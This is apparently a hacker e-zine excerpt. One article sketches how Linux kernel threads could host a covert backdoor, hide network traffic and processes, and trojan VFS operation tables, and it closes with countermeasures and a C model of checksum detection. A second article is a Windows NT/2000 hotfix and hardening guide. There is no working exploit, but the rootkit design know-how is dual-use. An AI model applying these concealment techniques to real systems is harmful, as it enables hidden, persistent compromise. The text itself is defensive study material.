The concept of kernel threads is nothing new. A kernel thread is, for most
purposes, no different than a regular user-land process, with three
exceptions:

-- Each kernel thread executes a single specific kernel function. This is in
   contrast to regular executable kernel functions accessible via events such
   as a system call.
-- Kernel threads run only in kernel mode, while regular processes run either
   in user mode or kernel mode (via system calls).
-- Kernel threads use only linear addresses greater than PAGE_OFFSET (defined
   in .h), due to the fact that they run only in kernel mode.

Source: Understanding the Linux Kernel, p94. ISBN: 0-596-00002-2

As mentioned, kernel threads are simply defined functions within the kernel
that are passed to the kernel_thread() call and daemonized. Kernel threads
acquire their run time via the scheduler, and have an execution priority
associated with them. One benefit of kernel threads is that since they are
already in kernel space, the latency associated with performing system calls
is removed. This is, in part, the justification that was used for the
implementation of the kernel httpd kernel thread.

+Kernel Threads containing Hostile Code+
----------------------------------------

So, how could a dubious individual utilize this feature of the Linux kernel to
implement hostile or subversive code on a system? A couple of ways come to
mind:

-- Back Orifice for Linux (or some similar Linux-based remote-administration
   *wink* tool).
-- Attack concealment (hiding files, connections, processes, etc.).

To implement these features, we will look at how kernel threads could access
the network overtly or covertly, and modify or intercept filesystem calls.
Another thing that could be done is to modify the memory management to
selectively load certain memory pages depending on some circumstance -- i.e.,
think double books.
+Kernel Threads And Overt Network Access+
-----------------------------------------

As a process, a kernel thread has a context. That permits it to easily possess
open file descriptors and network sockets. Because of this, writing a specific
kernel_thread that would accept connections, or write data to a network socket
(via the appropriate system calls), can be done from within kernel space. The
only challenge that would have to be handled by the developer of a kernel
thread requiring overt network access is working without the comfort of the
network libraries. Sure, one could probably statically link the libraries to
the module -- but it's a waste of space. Moreover, it takes the fun out of
writing a kernel thread. Ever hear of roughing it?

All of the network functions that could be used, with the exception of data
manipulation functions (i.e., htonl), eventually perform a system call. Guess
what? The kernel thread executes in kernel context! That means that the kernel
thread could simply call the system call directly. For example, to write the
buffer "Hello World" to a connected socket's file descriptor (say fd 10), one
would use:

ret_val = (*sys_call_table[__NR_write])(10,"Hello World",12);

+Kernel Threads And Covert Network Access+
------------------------------------------

Well, that's all fine and dandy. However, if the kernel_thread is truly
hostile it probably shouldn't have open network sockets just lying around.
Perhaps they could be hidden, but why even bother? Once again, the
kernel_thread is executing in kernel context. That means it can see the
incoming and outgoing network traffic as it is stored in the individual
sk_buff lists, accessible from the skb_head_pool.
Reference: linux/net/core/skbuff.c

By monitoring established network connections to read data, or using
established network connections to transmit data to the connected peer, the
activities of the kernel_thread can be concealed from the system, and specially
crafted communications utilities can use innocuous services that legitimately
operate on the victim host, such as httpd or sendmail, to manage the network
connections over which commands and responses are transmitted between a
controlling remote host and the victim host.

+Kernel Threads and File-system Access+
--------------------------------------

In UNIX, everything is represented on the filesystem. System memory itself
exists as a file, /dev/kmem. Without touching system call tables, how can one
control the actual filesystem activity?

In Linux, all the filesystems are abstracted under a virtual filesystem layer.
Associated with each instance of a filesystem on a device is an operations
structure, which maps the real filesystem operations to the VFS layer. In the
case of ext2fs, the ops table is defined in linux/fs/ext2/super.c and is
called ext2_sops. An attacker wishing to manipulate this structure has two
options:

1. Rewrite the structure with the trojaned operations.
2. Seek out all superblocks and currently open file descriptors, replacing the
   ops pointer with the address of the trojaned operations residing in the
   kernel_thread.

The first option is the easiest to implement: the trojaned structure is simply
copied over the original structure. No further changes are necessary. If the
structure is being monitored via a checksumming mechanism, it will be
identified as changed (for a static structure this is definitely a sign that
something is afoot). The risk of this occurring is mitigated by the fact that
the ext2_sops structure is not an exported symbol, and is not easily
monitored.

The second option would be harder to detect, but requires more work to
implement.
First, each mounted filesystem would have to have its in-memory copy of its
superblock modified to reference the trojaned operations structure. Secondly,
all currently open files on those filesystems would have to be modified, as
they copy the ops pointer from their superblock upon creation of the file
descriptor.

+Kernel Thread Concealment+
---------------------------

What good is a kernel thread to do all the nice and naughty things in the
world if it stands out like a sore thumb? I mean, part of the reason for
looking at this is to hide one's presence. Then why would one be content
having a kernel thread appear as:

root 9 0.0 0.1 1368 72 ? S Jul14 0:12 [ur0wn3d]

OK, maybe that is a little bit over the top, but you get the point. Again, a
simple solution: remember that filesystem stuff? Yep, the proc filesystem
too. One word: proc_sops

+Detection and Countermeasures+
-------------------------------

So, faced with this type of mechanism that can conceal attacks and be used as
a remote administration tool for Linux systems, how do we protect ourselves?

1. Disabling the kernel_thread call is insufficient. Even if the call is
   disabled on a system after the necessary kernel threads are started, one
   can use the time during init_module to 'roll their own' kernel thread
   call.
2. Checksumming various common and critical filesystem, memory management, and
   scheduling data structures would prevent a kernel thread from using its
   position to subvert the low-level memory management, filesystem, and
   scheduling code. This does not detect or prevent other malicious effects
   that could be caused by the kernel thread.
3. In StJude, tie kernel threads to the default (no privilege) rule. Kernel
   threads can be identified by abnormalities in their task_struct, so this
   is possible. It would limit the use of kernel threads as remote
   administration tools.

This is just a brief summary of possible countermeasures. Others may follow.
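As an added illustration of countermeasure 2, and of the two ways of tampering with an ops table described in the filesystem section, here is a user-space C model (not code from this paper, from StMichael or from the kernel): a struct of function pointers standing in for a table like ext2_sops, a checksum of it recorded at startup, and a re-check later. The struct, the superblock stand-in, the FNV-1a hash and the decoy table are all constructed for the example; in a real monitor the same comparison runs inside the kernel against the real structures. It also shows why option 2 (repointing the superblock at a copy) slips past a checksum of the original table alone, and the companion check, "does the superblock still point at the known table?", that catches it.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for a VFS operations table such as ext2_sops (constructed). */
struct fake_super_ops {
    int (*read_inode)(int ino);
    int (*write_inode)(int ino);
    int (*statfs)(void);
};

/* Stand-in for an in-memory superblock: open files copy 'ops' from here. */
struct fake_superblock {
    const char *dev;
    const struct fake_super_ops *ops;
};

static int real_read_inode(int ino)  { return ino; }
static int real_write_inode(int ino) { return ino + 1; }
static int real_statfs(void)         { return 0; }
static int decoy_statfs(void)        { return -1; }   /* the "trojaned" operation */

/* The genuine table and a decoy table an attacker would point things at. */
static struct fake_super_ops genuine_ops = { real_read_inode, real_write_inode, real_statfs };
static struct fake_super_ops decoy_ops   = { real_read_inode, real_write_inode, decoy_statfs };

/* FNV-1a 64-bit over a byte range: a cheap checksum for a static structure. */
uint64_t fnv1a64(const void *buf, size_t len) {
    const unsigned char *p = buf;
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= 0x100000001b3ULL;
    }
    return h;
}

/* What the monitor remembers from boot time: the table's checksum and address. */
struct ops_baseline {
    uint64_t checksum;
    const struct fake_super_ops *addr;
};

struct ops_baseline record_baseline(const struct fake_super_ops *ops) {
    struct ops_baseline b;
    b.checksum = fnv1a64(ops, sizeof *ops);
    b.addr = ops;
    return b;
}

/* Countermeasure 2: re-checksum the table. 1 if its contents changed (option 1). */
int ops_table_modified(const struct ops_baseline *b) {
    return fnv1a64(b->addr, sizeof *b->addr) != b->checksum;
}

/* Companion check for option 2: 1 if the superblock no longer references
 * the table whose address was recorded at boot. */
int sb_ops_redirected(const struct fake_superblock *sb, const struct ops_baseline *b) {
    return sb->ops != b->addr;
}

/* Runs both scenarios and returns a bitmask:
 * bit 0: clean system passes both checks
 * bit 1: in-place overwrite (option 1) caught by the checksum
 * bit 2: pointer redirection (option 2) missed by the checksum, caught by the address check */
int run_demo(void) {
    int result = 0;
    struct ops_baseline base = record_baseline(&genuine_ops);
    struct fake_superblock sb = { "hda1", &genuine_ops };

    if (!ops_table_modified(&base) && !sb_ops_redirected(&sb, &base)) result |= 1;

    /* Option 1: a trojaned entry is copied over the original structure. */
    genuine_ops.statfs = decoy_statfs;
    if (ops_table_modified(&base)) result |= 2;
    genuine_ops.statfs = real_statfs;            /* restore for a repeatable demo */

    /* Option 2: the original is left intact; the superblock is repointed. */
    sb.ops = &decoy_ops;
    if (!ops_table_modified(&base) && sb_ops_redirected(&sb, &base)) result |= 4;
    return result;
}

int main(void) {
    int r = run_demo();
    printf("clean=%d overwrite_detected=%d redirect_detected=%d\n",
           r & 1, !!(r & 2), !!(r & 4));
    return r == 7 ? 0 : 1;
}
```

The point of the second scenario is that a checksum of the static structure is necessary but not sufficient: once the attacker stops touching the original table, the monitor also has to verify every superblock and open file still references the table it knew at boot.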
Despite this, kernel threads provide an elegant and dangerous mechanism for the
implementation of hostile code within the Linux kernel.

[I Got Windows, Now What?]==============================================[Ntwak0]

>------------------------------------------------------------------------------<
>-----------------------------------------<
| * 1- I got NT / 2K Now What ?           |
| * 2- Who Should Read This ?             |
| * 3- What does it Cover ?               |
| * 4- After you install NT Do this ?     |
| * 5- NT HotFixes By File Version ?      |
| * 6- After you install NT HotFixes ?    |
| * 7- Next KV will Cover The Registry    |
>-----------------------------------------<
>------------------------------------------------------------------------------<

>------------------------------<
>---I got NT / 2K Now What ?---<
>------------------------------<

As you may know, the NT and 2K default install is not the FULL secure install.
This paper is Multi-Part; this means I am going to cover the HOTFIXES section
in this article, and the next article will cover the NT + 2000 Registry (Wait
for it :). I am going to cover NT hotfixes, and if I still have space in this
article I will cover 2000 hotfixes. In my descriptions I am going to be brief
but effective, no BLAH BLAH...etc...

>------------------------------<
>---Who Should Read This ? ---<
>------------------------------<

Any home user who likes to patch his / her box
Any business user who likes to cut time when fixing his / her NT 2000 box
Any NT sysadmin who likes to learn a bit more

>------------------------------<
>---What does it Cover ? ---<
>------------------------------<

This version covers NT hotfixes by file version. What do I mean by file
version? Here is the catch: most commercial tools that check for HOTFIXES do it
by querying the REGISTRY. I will explain more. When you install an NT hotfix, a
registry key is created and some files or registry keys are updated, all
depending on the hotfix. Checking the registry KEY is not the perfect way to
make sure you have the latest file version. As we all know, when you install an
application, files get replaced and changed and so on... for this reason I
decided to check for HOTFIXES using file version. Sure, this method is a pain
in the a$$, but at least once done I will be sure all my files are OK.

OH !!! Before we start, do not get SCARED by the number of HOTFIXES.

>------------------------------------------<
>---After you install NT or 2K Do this ?---<
>------------------------------------------<

---> Install SP (Service Pack)

First thing you should do after you configure your NT or 2K to connect to the
internet is to start fixing it :)

===============
NT Server & Wks
===============

When you install NT by default you do not have a browser capable of connecting
to the MS site and getting the hotfixes. I suggest you install the latest
(IE 5.5). To install IE 5.5 you cannot just go from the default NT install to
the MS site and get the latest IE, because your default IE is 3 and the MS site
needs frame support and other gadgets. SO to solve this, open your browser,
IE 3 default or whatever.

---> Connect to Microsoft site and get the Service Pack Sp6a from this
     location:
http://download.microsoft.com/download/ie55sp1/Install/5.5_SP1/WIN98Me/EN-US/ie5setup.exe

Get that file and then you are all SET -:). After you install IE 5.5 SP1,
install SP6a for NT and SP2 for 2000; install the 120 Bits version if you are
allowed.
---> Connect to Microsoft site and get the Service Pack Sp6a from this
     location:
http://support.microsoft.com/Support/NTServer/Content/ServicePacks/Default.asp

If you need to read more about the service pack installation, point your
browser to:
http://www.microsoft.com/ntserver/nts/downloads/recommended/SP6/

---> Install SP6a 128 bits and Reboot

==================
2K Advanced Server
==================

---> Connect to Microsoft site and get the Service Pack SP2 from this
     location:
http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/sp2lang.asp

---> Install SP2 and Reboot

>------------------------------------<
>---NT HotFixes By File Version ? ---<
>------------------------------------<

===============
NT Server & Wks
===============

You need to download the hotfixes and install them. Here is a list of
available hotfixes. After getting what you need, put them in one directory and
create a batch file to install them all without rebooting every time.

HINT: To install a HotFix without rebooting and without creating an uninstall
directory, use these switches after the HOTFIX.exe: -q -z -n. Some HotFixes
need /Q. To know what you need exactly, type the hotfix number followed by /?
"QXXXXXX.exe /?"
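The file-version check that this article argues for, as an added example (not code from the article, nor from any Microsoft tool): a small C checker that compares installed file versions against rules of the same shape as the list further down. The three NT4 rules embedded here take their file names and versions from that list; the inventory of installed versions is constructed for the example (a real scanner would read each file's version resource). The detail that matters is that versions are compared numerically part by part, because comparing them as strings ranks 4.0.1381.999 above 4.0.1381.7086.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One rule from the hotfix list: the bulletin, the file the hotfix replaces
 * (relative to %SystemRoot%) and the minimum file version that proves the
 * hotfix is really installed. */
struct hotfix_rule {
    const char *bulletin;
    const char *file;
    const char *version;
};

/* What a scan of the box found. Constructed for this example. */
struct installed_file {
    const char *file;
    const char *version;
};

static const struct hotfix_rule rules[] = {
    { "MS00-003", "system32\\NTOSKRNL.EXE",       "4.0.1381.7086" },
    { "MS00-004", "system32\\rdisk.exe",          "4.0.1381.7033" },
    { "MS00-029", "system32\\drivers\\tcpip.sys", "4.0.1381.7050" },
    { "MS00-006", "system32\\idq.dll",            "5.0.1781.3"    },
};

static const struct installed_file inventory[] = {
    { "system32\\NTOSKRNL.EXE",       "4.0.1381.7086" },  /* exactly the required build */
    { "system32\\rdisk.exe",          "4.0.1381.7001" },  /* older than MS00-004 requires */
    { "system32\\drivers\\tcpip.sys", "4.0.1381.7050" },  /* patched */
    /* idq.dll deliberately absent: no Index Server, so MS00-006 does not apply */
};

/* Split "a.b.c.d" into up to four numeric parts (missing parts read as 0).
 * Returns 1 on success, 0 if the string is not a dotted number. */
int parse_version(const char *s, unsigned long parts[4]) {
    int n = 0;
    for (int i = 0; i < 4; i++) parts[i] = 0;
    while (n < 4) {
        char *end;
        if (*s < '0' || *s > '9') return 0;      /* every part must start with a digit */
        parts[n++] = strtoul(s, &end, 10);
        if (*end == '\0') return 1;              /* whole string consumed */
        if (*end != '.') return 0;
        s = end + 1;
    }
    return 0;                                    /* more than four parts */
}

/* Numeric, part-by-part comparison. Returns <0, 0 or >0 like strcmp;
 * an unparsable string sorts lowest. */
int version_cmp(const char *a, const char *b) {
    unsigned long va[4], vb[4];
    int oka = parse_version(a, va), okb = parse_version(b, vb);
    if (!oka || !okb) return oka - okb;
    for (int i = 0; i < 4; i++)
        if (va[i] != vb[i]) return va[i] < vb[i] ? -1 : 1;
    return 0;
}

/* A hotfix counts as missing when the installed file is older than the rule
 * demands, or when the installed version cannot be read at all. */
int hotfix_missing(const char *installed, const char *required) {
    return version_cmp(installed, required) < 0;
}

static const char *installed_version_of(const char *file) {
    for (size_t i = 0; i < sizeof inventory / sizeof inventory[0]; i++)
        if (strcmp(inventory[i].file, file) == 0) return inventory[i].version;
    return NULL;
}

/* Walk the rules against the inventory, print a verdict per rule and return
 * how many applicable hotfixes are missing. A file that is not on the box
 * makes the rule not applicable rather than failed. */
int count_missing_hotfixes(void) {
    int missing = 0;
    for (size_t i = 0; i < sizeof rules / sizeof rules[0]; i++) {
        const struct hotfix_rule *r = &rules[i];
        const char *have = installed_version_of(r->file);
        if (have == NULL) {
            printf("%s: %s not present, rule not applicable\n", r->bulletin, r->file);
        } else if (hotfix_missing(have, r->version)) {
            printf("%s: MISSING, %s is %s, need %s\n", r->bulletin, r->file, have, r->version);
            missing++;
        } else {
            printf("%s: ok (%s %s)\n", r->bulletin, r->file, have);
        }
    }
    return missing;
}

int main(void) {
    return count_missing_hotfixes() == 0 ? 0 : 1;   /* non-zero exit when anything is missing */
}
```

Run against the constructed inventory it reports MS00-004 as missing, MS00-003 and MS00-029 as ok, and MS00-006 as not applicable; to use it for real, replace the inventory with versions read from the files on disk.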
Example of a batch file that installs the HOTFIXES for you without rebooting:

---[SNIP]---
echo ------[ This is an example of batch file that install NT Hotfixes]------
echo ------[ MS00-003:Q247869 Spoofed LPC Port Request]------
Q247869i.EXE -n -q -z
echo ------[ MS00-004:Q249108 RDISK Registry Enumeration File]------
Q249108i.EXE -n -q -z
---[SNIP]---

Here is the list of needed HOTFIXES for NT without IIS 4; this will include
file name, file version and a brief description.

Saturday, July 07, 2001 6:53:50PM

NT4 MS00-003
Description=Q247869 MS00-003 Spoofed LPC Port Request
Info=http://www.microsoft.com/technet/security/bulletin/fq00-003.asp
Q247869i.EXE -n -q -z
File=%SystemRoot%\system32\NTOSKRNL.EXE
Version=4.0.1381.7086

NT4 MS00-004
Description=MS00-004: RDISK Registry Enumeration File
Info=http://www.microsoft.com/technet/security/bulletin/ms00-004.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17745
Q249108i.EXE -n -q -z
File=%SystemRoot%\system32\rdisk.exe
Version=4.0.1381.7033

NT4 MS00-005 A
Description=MS00-005: Malformed RTF Control Word
Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Q249973i.EXE -n -q -z
File=%SystemRoot%\system32\riched20.dll
Version=5.0.122.2

NT4 MS00-005 B
Description=MS00-005: Malformed RTF Control Word
Info=http://www.microsoft.com/technet/security/bulletin/ms00-005.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17510
Q249973i.EXE -n -q -z
File=%SystemRoot%\system32\riched32.dll
Version=4.0.835.1381

NT4 MS00-006 A
Description=MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\idq.dll
Version=5.0.1781.3

NT4 MS00-006 B
Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\query.dll
Version=5.0.1781.3

NT4 MS00-006 C
Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument
Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp
q252463i.exe -n -q -z
File=%SystemRoot%\system32\webhits.dll
Version=5.0.1781.3

NT4 MS00-007
Description=MS00-007: Recycle Bin Creation
Info=http://www.microsoft.com/technet/security/bulletin/ms00-007.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=22155
Q248399i.EXE -n -q -z
File=%SystemRoot%\system32\shell32.dll
Version=4.0.1381.7037

NT4 MS00-008 A
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Control\SecurePipeServers\winreg
Perm=Administrators:(Full)*1,Backup Operators:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 B
Description=MS00-008: Registry Permissions
Key=HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths
Perm=Administrators:(Full)*1,Backup Operators:(Read)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330
Value Type: REG_MULTI_SZ - Multi string
Default Data:
  System\\CurrentControlSet\\Control\\ProductOptions
  System\\CurrentControlSet\\Control\\Print\\Printers
  System\\CurrentControlSet\\Services\\Eventlog
  Software\\Microsoft\\Windows NT\\CurrentVersion
  System\\CurrentControlSet\\Services\\Replicator

NT4 MS00-008 C
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 D
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\AdvancedDataFactory
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 E
Description=MS00-008: Registry Permissions
Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\RDSServer.DataFactory
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 F
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 G
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 H
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 I
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP.Handler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 J
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VB.Handler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 K
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VC.Handler
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 L
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-008 M
Description=MS00-008: Registry Permissions
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1
Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330

NT4 MS00-021
Description=MS00-021: Malformed TCP/IP Print Request
Info=http://www.microsoft.com/technet/security/bulletin/ms00-021.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20015
Q257870i.EXE -n -q -z
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q257870
Name=Installed
Value=1
Warn=More tests to be done to find the correct version and location of the
file lpdsvc.dll. This file is installed when you install the hotfix
Q257870i.EXE normally.

NT4 MS00-024
Description=MS00-024: OffloadModExpo Registry Permissions
Info=http://www.microsoft.com/technet/security/bulletin/ms00-024.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q259496/NT4/EN-US/Q259496i.exe
File=%SystemRoot%\system32\regacl40.exe
Version=4.0.1381.7064

NT4 MS00-027
Description=MS00-027: Malformed Environment Variable
Info=http://www.microsoft.com/technet/security/bulletin/ms00-027.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20494
Q259622i.EXE -n -q -z
File=%SystemRoot%\system32\CMD.EXE
Version=4.0.1381.7048

NT4 MS00-029
Description=MS00-029: IP Fragment Reassembly
Info=http://www.microsoft.com/technet/security/bulletin/ms00-029.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829
Q259728i.EXE -n -q -z
File=%SystemRoot%\system32\drivers\tcpip.sys
Version=4.0.1381.7050

NT4 MS00-036
Description=MS00-036: ResetBrowser Frame
Info=http://www.microsoft.com/technet/security/bulletin/ms00-036.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=21397
Q262694i.EXE -n -q -z
File=%SystemRoot%\system32\drivers\rdr.sys
Version=4.0.1381.7055

NT4 MS00-040 A
Description=MS00-040: Remote Registry Access Authentication
Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q264684i.EXE
Q264684i.EXE -n -q -z
File=%SystemRoot%\system32\rpcrt4.dll
Version=4.0.1381.7058

NT4 MS00-040 B
Description=MS00-040: Remote Registry Access Authentication
Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp
Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q264684i.EXE
Q264684i.EXE -n -q -z
File=%SystemRoot%\system32\WINLOGON.EXE
Version=4.0.1381.7058

NT4 MS00-047
Description=MS00-047: NetBIOS Name Server Protocol Spoofing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-047.asp
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q269239/download.asp
File=%SystemRoot%\system32\drivers\netbt.sys
Version=4.0.1381.7086

NT4 MS00-052 A
Description=MS00-052: Relative Shell Path
Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360
q269049i.exe -n -q -z
File=%SystemRoot%\system32\MSGINA.DLL
Version=4.0.1381.7085

NT4 MS00-052 B
Description=MS00-052: Relative Shell Path
Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360
q269049i.exe -n -q -z
File=%SystemRoot%\system32\USERINIT.EXE
Version=4.0.1381.7085

NT4 MS00-070 A
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\NTOSKRNL.EXE
Version=4.0.1381.7086

NT4 MS00-070 B
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\MSAUDITE.DLL
Version=4.0.1381.7086

NT4 MS00-070 C
Description=MS00-070: Multiple LPC and LPC Ports
Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650
q266433i.exe -n -q -z
File=%SystemRoot%\system32\SMSS.EXE
Version=4.0.1381.7086

NT4 MS00-077
Description=MS00-077: NetMeeting Desktop Sharing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-077.asp
Patch=http://download.microsoft.com/download/netmeeting/SP/3.01/W9XNT4/EN-US/NM30.EXE
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q266433
Name=Installed
Value=1

NT4 MS00-081
Description=MS00-081 VM File Reading
Info=http://www.microsoft.com/TechNet/security/bulletin/MS00-081.asp
Patch=http://download.microsoft.com/download/vm/Install/3802/W9X2KMe/EN-US/msjavx86.exe
JAVA: All builds in the 3000 series numbered 3318 or earlier.
File=%SystemRoot%\jview.exe
Version=5.0.3802.0

NT4 MS00-083
Description=MS00-083: Netmon Protocol Parsing
Info=http://www.microsoft.com/technet/security/bulletin/MS00-083.asp
Patch=http://download.microsoft.com/download/win2000platform/Patch/Q274835/NT5/EN-US/Q274835_W2K_SP2_x86 En.EXE
q274835i.exe -n -q -z
Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q274835
Name=Installed
Value=1

NT4 MS00-090 A
Description=Q238934 Q280419 MS00-090 .ASX Buffer Overrun and .WMS Script
Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
wmsu33995.exe /Q
File=%SystemRoot%\system32\dxmasf.dll
Version=6.4.9.1109

NT4 MS00-090 B
Description=MS00-090 .ASX Buffer Overrun and .WMS Script
Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
wmsu33995.exe /Q
File=%SystemRoot%\system32\advpack.dll
Version=5.50.4522.1800

NT4 MS00-091
Description=MS00-091: Incomplete TCP/IP Packet
Info=http://www.microsoft.com/technet/security/bulletin/ms00-091.asp
Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q275567/download.asp
File=%SystemRoot%\system32\drivers\netbt.sys
Version=4.0.1381.7086

NT4 MS00-094
Description=MS00-094: Phone Book Service Buffer Overflow
Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp
Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26193
Q276575i.EXE -n -q -z
The fix will patch pbserver.dll.
